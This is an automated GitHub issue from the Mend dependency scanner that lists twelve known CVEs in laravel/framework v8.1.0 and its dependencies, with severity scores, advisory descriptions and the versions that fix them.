Skip to content

laravel/framework-v8.1.0: 12 vulnerabilities (highest severity is: 9.8) #8

New issue
New issue
Open
Open
laravel/framework-v8.1.0: 12 vulnerabilities (highest severity is: 9.8)#8
Labels
Mend: dependency security vulnerabilitySecurity vulnerability detected by Mend
@mend-for-github-com

Description

@mend-for-github-com
mend-for-github-com
bot
opened on Aug 13, 2022
Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Vulnerabilities

Vulnerability Severity CVSS Dependency Type Fixed in (laravel/framework-v8.1.0 version) Remediation Possible**
CVE-2025-27515 Critical 9.8 laravel/framework-v8.1.0 Direct v11.44.1
CVE-2021-43617 Critical 9.8 laravel/framework-v8.1.0 Direct php-illuminate-session - 6.20.14+dfsg-2+deb11u1;php-illuminate-broadcasting - 6.20.14+dfsg-2+deb11u1;php-illuminate-config - 6.20.14+dfsg-2+deb11u1;php-illuminate-cookie - 6.20.14+dfsg-2+deb11u1;php-laravel-framework - 6.20.14+dfsg-2+deb11u1;php-illuminate-database - 6.20.14+dfsg-2+deb11u1;php-illuminate-translation - 6.20.14+dfsg-2+deb11u1;php-illuminate-support - 6.20.14+dfsg-2+deb11u1;php-illuminate-encryption - 6.20.14+dfsg-2+deb11u1;php-illuminate-hashing - 6.20.14+dfsg-2+deb11u1;php-illuminate-auth - 6.20.14+dfsg-2+deb11u1;php-illuminate-http - 6.20.14+dfsg-2+deb11u1;php-illuminate-mail - 6.20.14+dfsg-2+deb11u1;php-illuminate-view - 6.20.14+dfsg-2+deb11u1;php-illuminate-pipeline - 6.20.14+dfsg-2+deb11u1;php-illuminate-filesystem - 6.20.14+dfsg-2+deb11u1;php-illuminate-validation - 6.20.14+dfsg-2+deb11u1;php-illuminate-container - 6.20.14+dfsg-2+deb11u1;php-illuminate-notifications - 6.20.14+dfsg-2+deb11u1;php-illuminate-cache - 6.20.14+dfsg-2+deb11u1;php-illuminate-contracts - 6.20.14+dfsg-2+deb11u1;php-illuminate-routing - 6.20.14+dfsg-2+deb11u1;php-illuminate-queue - 6.20.14+dfsg-2+deb11u1;php-illuminate-redis - 6.20.14+dfsg-2+deb11u1;php-illuminate-bus - 6.20.14+dfsg-2+deb11u1;php-illuminate-log - 6.20.14+dfsg-2+deb11u1;php-illuminate-console - 6.20.14+dfsg-2+deb11u1;php-illuminate-pagination - 6.20.14+dfsg-2+deb11u1;php-illuminate-events - 6.20.14+dfsg-2+deb11u1
CVE-2021-32708 Critical 9.8 league/flysystem-1.1.3 Transitive N/A*
CVE-2021-21263 High 7.2 laravel/framework-v8.1.0 Direct v6.20.11,v7.30.2,v8.22.1
CVE-2021-41267 Medium 6.5 symfony/http-kernel-v5.1.5 Transitive N/A*
CVE-2025-46734 Medium 6.4 league/commonmark-1.5.5 Transitive N/A*
CVE-2022-24894 Medium 5.9 symfony/http-kernel-v5.1.5 Transitive N/A*
CVE-2021-43808 Medium 5.3 laravel/framework-v8.1.0 Direct v6.20.42, v7.30.6, v8.75.0
CVE-2024-28859 Medium 5.0 swiftmailer/swiftmailer-v6.2.3 Transitive N/A*
CVE-2024-50345 Low 3.1 symfony/http-foundation-v5.1.5 Transitive N/A*
CVE-2024-52301 Low 0.0 laravel/framework-v8.1.0 Direct laravel/framework-6.20.45,7.30.7,8.83.28,9.52.17,10.48.23,11.31.0
CVE-2024-51736 Low 0.0 symfony/process-v5.1.5 Transitive N/A*

*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.

**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation

Details

CVE-2025-27515

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. When using wildcard validation to validate a given file or image field ("files.*"), a user-crafted malicious request could potentially bypass the validation rules. This vulnerability is fixed in 11.44.1 and 12.1.1.

Publish Date: 2025-03-05

URL: CVE-2025-27515

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-78fx-h6xr-vch4

Release Date: 2025-03-05

Fix Resolution: v11.44.1

CVE-2021-43617

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. NOTE: this CVE Record is for Laravel Framework, and is unrelated to any reports concerning incorrectly written user applications for image upload.

Publish Date: 2021-11-14

URL: CVE-2021-43617

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2021-43617

Release Date: 2021-11-14

Fix Resolution: php-illuminate-session - 6.20.14+dfsg-2+deb11u1;php-illuminate-broadcasting - 6.20.14+dfsg-2+deb11u1;php-illuminate-config - 6.20.14+dfsg-2+deb11u1;php-illuminate-cookie - 6.20.14+dfsg-2+deb11u1;php-laravel-framework - 6.20.14+dfsg-2+deb11u1;php-illuminate-database - 6.20.14+dfsg-2+deb11u1;php-illuminate-translation - 6.20.14+dfsg-2+deb11u1;php-illuminate-support - 6.20.14+dfsg-2+deb11u1;php-illuminate-encryption - 6.20.14+dfsg-2+deb11u1;php-illuminate-hashing - 6.20.14+dfsg-2+deb11u1;php-illuminate-auth - 6.20.14+dfsg-2+deb11u1;php-illuminate-http - 6.20.14+dfsg-2+deb11u1;php-illuminate-mail - 6.20.14+dfsg-2+deb11u1;php-illuminate-view - 6.20.14+dfsg-2+deb11u1;php-illuminate-pipeline - 6.20.14+dfsg-2+deb11u1;php-illuminate-filesystem - 6.20.14+dfsg-2+deb11u1;php-illuminate-validation - 6.20.14+dfsg-2+deb11u1;php-illuminate-container - 6.20.14+dfsg-2+deb11u1;php-illuminate-notifications - 6.20.14+dfsg-2+deb11u1;php-illuminate-cache - 6.20.14+dfsg-2+deb11u1;php-illuminate-contracts - 6.20.14+dfsg-2+deb11u1;php-illuminate-routing - 6.20.14+dfsg-2+deb11u1;php-illuminate-queue - 6.20.14+dfsg-2+deb11u1;php-illuminate-redis - 6.20.14+dfsg-2+deb11u1;php-illuminate-bus - 6.20.14+dfsg-2+deb11u1;php-illuminate-log - 6.20.14+dfsg-2+deb11u1;php-illuminate-console - 6.20.14+dfsg-2+deb11u1;php-illuminate-pagination - 6.20.14+dfsg-2+deb11u1;php-illuminate-events - 6.20.14+dfsg-2+deb11u1

CVE-2021-32708

Vulnerable Library - league/flysystem-1.1.3

Filesystem abstraction: Many filesystems, one API.

Library home page: https://api.github.com/repos/thephpleague/flysystem/zipball/9be3b16c877d477357c015cec057548cf9b2a14a

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • league/flysystem-1.1.3 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.

Publish Date: 2021-06-24

URL: CVE-2021-32708

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-9f46-5r25-5wfm

Release Date: 2021-06-24

Fix Resolution: 1.1.4,2.1.1

CVE-2021-21263

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. Versions of Laravel before 6.20.11, 7.30.2 and 8.22.1 contain a query binding exploitation. This same exploit applies to the illuminate/database package which is used by Laravel. If a request is crafted where a field that is normally a non-array value is an array, and that input is not validated or cast to its expected type before being passed to the query builder, an unexpected number of query bindings can be added to the query. In some situations, this will simply lead to no results being returned by the query builder; however, it is possible certain queries could be affected in a way that causes the query to return unexpected results.

Publish Date: 2021-01-19

URL: CVE-2021-21263

CVSS 3 Score Details (7.2)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-3p32-j457-pg5x

Release Date: 2021-01-19

Fix Resolution: v6.20.11,v7.30.2,v8.22.1

CVE-2021-41267

Vulnerable Library - symfony/http-kernel-v5.1.5

Symfony HttpKernel Component

Library home page: https://api.github.com/repos/symfony/http-kernel/zipball/3e32676e6cb5d2081c91a56783471ff8a7f7110b

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/http-kernel-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symfony/Http-Kernel is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the "trusted_headers" allowed list are ignored and protect users from "Cache poisoning" attacks. In Symfony 5.2, maintainers added support for the "X-Forwarded-Prefix" headers, but this header was accessible in SubRequest, even if it was not part of the "trusted_headers" allowed list. An attacker could leverage this opportunity to forge requests containing a "X-Forwarded-Prefix" header, leading to a web cache poisoning issue. Versions 5.3.12 and later have a patch to ensure that the "X-Forwarded-Prefix" header is not forwarded to subrequests when it is not trusted.

Publish Date: 2021-11-24

URL: CVE-2021-41267

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

CVE-2025-46734

Vulnerable Library - league/commonmark-1.5.5

Highly-extensible PHP Markdown parser which fully supports the CommonMark spec and Github-Flavored Markdown (GFM)

Library home page: https://api.github.com/repos/thephpleague/commonmark/zipball/45832dfed6007b984c0d40addfac48d403dc6432

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • league/commonmark-1.5.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

league/commonmark is a PHP Markdown parser. A cross-site scripting (XSS) vulnerability in the Attributes extension of the league/commonmark library (versions 1.5.0 through 2.6.x) allows remote attackers to insert malicious JavaScript calls into HTML. The league/commonmark library provides configuration options such as "html_input: 'strip'" and "allow_unsafe_links: false" to mitigate cross-site scripting (XSS) attacks by stripping raw HTML and disallowing unsafe links. However, when the Attributes Extension is enabled, it introduces a way for users to inject arbitrary HTML attributes into elements via Markdown syntax using curly braces. Version 2.7.0 contains three changes to prevent this XSS attack vector: All attributes starting with "on" are considered unsafe and blocked by default; support for an explicit allowlist of allowed HTML attributes; and manually-added "href" and "src" attributes now respect the existing "allow_unsafe_links" configuration option. If upgrading is not feasible, please consider disabling the "AttributesExtension" for untrusted users and/or filtering the rendered HTML through a library like HTMLPurifier.

Publish Date: 2025-05-05

URL: CVE-2025-46734

CVSS 3 Score Details (6.4)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-3527-qv2q-pfvx

Release Date: 2025-05-05

Fix Resolution: league/commonmark - 2.7.0

CVE-2022-24894

Vulnerable Library - symfony/http-kernel-v5.1.5

Symfony HttpKernel Component

Library home page: https://api.github.com/repos/symfony/http-kernel/zipball/3e32676e6cb5d2081c91a56783471ff8a7f7110b

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/http-kernel-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. The Symfony HTTP cache system, acts as a reverse proxy: It caches entire responses (including headers) and returns them to the clients. In a recent change in the "AbstractSessionListener", the response might contain a "Set-Cookie" header. If the Symfony HTTP cache system is enabled, this response might bill stored and return to the next clients. An attacker can use this vulnerability to retrieve the victim's session. This issue has been patched and is available for branch 4.4.

Publish Date: 2023-02-03

URL: CVE-2022-24894

CVSS 3 Score Details (5.9)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: Low
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

CVE-2021-43808

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. Laravel prior to versions 8.75.0, 7.30.6, and 6.20.42 contain a possible cross-site scripting (XSS) vulnerability in the Blade templating engine. A broken HTML element may be clicked and the user taken to another location in their browser due to XSS. This is due to the user being able to guess the parent placeholder SHA-1 hash by trying common names of sections. If the parent template contains an exploitable HTML structure an XSS vulnerability can be exposed. This vulnerability has been patched in versions 8.75.0, 7.30.6, and 6.20.42 by determining the parent placeholder at runtime and using a random hash that is unique to each request.

Publish Date: 2021-12-07

URL: CVE-2021-43808

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-66hf-2p6w-jqfw

Release Date: 2021-12-07

Fix Resolution: v6.20.42, v7.30.6, v8.75.0

CVE-2024-28859

Vulnerable Library - swiftmailer/swiftmailer-v6.2.3

Swiftmailer, free feature-rich PHP mailer

Library home page: https://api.github.com/repos/swiftmailer/swiftmailer/zipball/149cfdf118b169f7840bbe3ef0d4bc795d1780c9

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • swiftmailer/swiftmailer-v6.2.3 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symfony1 is a community fork of symfony 1.4 with DIC, form enhancements, latest Swiftmailer, better performance, composer compatible and PHP 8 support. Symfony 1 has a gadget chain due to vulnerable Swift Mailer dependency that would enable an attacker to get remote code execution if a developer unserialize user input in his project. This vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. Symfony 1 depends on Swift Mailer which is bundled by default in vendor directory in the default installation since 1.3.0. Swift Mailer classes implement some "__destruct()" methods. These methods are called when php destroys the object in memory. However, it is possible to include any object type in "$this->_keys" to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on foreach($this->_keys ...) for any class implementing ArrayAccess interface. This may allow an attacker to execute any PHP command which leads to remote code execution. This issue has been addressed in version 1.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Publish Date: 2024-03-15

URL: CVE-2024-28859

CVSS 3 Score Details (5.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

CVE-2024-50345

Vulnerable Library - symfony/http-foundation-v5.1.5

Symfony HttpFoundation Component

Library home page: https://api.github.com/repos/symfony/http-foundation/zipball/41a4647f12870e9d41d9a7d72ff0614a27208558

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/http-foundation-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

symfony/http-foundation is a module for the Symphony PHP framework which defines an object-oriented layer for the HTTP specification. The "Request" class, does not parse URI with special characters the same way browsers do. As a result, an attacker can trick a validator relying on the "Request" class to redirect users to another domain. The "Request::create" methods now assert the URI does not contain invalid characters as defined by https://url.spec.whatwg.org/. This issue has been patched in versions 5.4.46, 6.4.14, and 7.1.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Publish Date: 2024-11-06

URL: CVE-2024-50345

CVSS 3 Score Details (3.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-mrqx-rp3w-jpjp

Release Date: 2024-11-06

Fix Resolution: symfony/http-foundation - v5.4.46,v6.4.14,v7.1.7

CVE-2024-52301

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. When the register_argc_argv php directive is set to on , and users call any URL with a special crafted query string, they are able to change the environment used by the framework when handling the request. The vulnerability fixed in 6.20.45, 7.30.7, 8.83.28, 9.52.17, 10.48.23, and 11.31.0. The framework now ignores argv values for environment detection on non-cli SAPIs.

Publish Date: 2024-11-12

URL: CVE-2024-52301

CVSS 3 Score Details (0.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-gv7v-rgg6-548h

Release Date: 2024-11-12

Fix Resolution: laravel/framework-6.20.45,7.30.7,8.83.28,9.52.17,10.48.23,11.31.0

CVE-2024-51736

Vulnerable Library - symfony/process-v5.1.5

Symfony Process Component

Library home page: https://api.github.com/repos/symfony/process/zipball/1864216226af21eb76d9477f691e7cbf198e0402

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/process-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Symphony process is a module for the Symphony PHP framework which executes commands in sub-processes. On Windows, when an executable file named "cmd.exe" is located in the current working directory it will be called by the "Process" class when preparing command arguments, leading to possible hijacking. This issue has been addressed in release versions 5.4.46, 6.4.14, and 7.1.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Publish Date: 2024-11-06

URL: CVE-2024-51736

CVSS 3 Score Details (0.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2024-11-06

Fix Resolution: symfony/process - v5.4.46,v6.4.14,v7.1.7

Metadata

Metadata

Assignees

No one assigned

    Labels

    Mend: dependency security vulnerabilitySecurity vulnerability detected by Mend

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions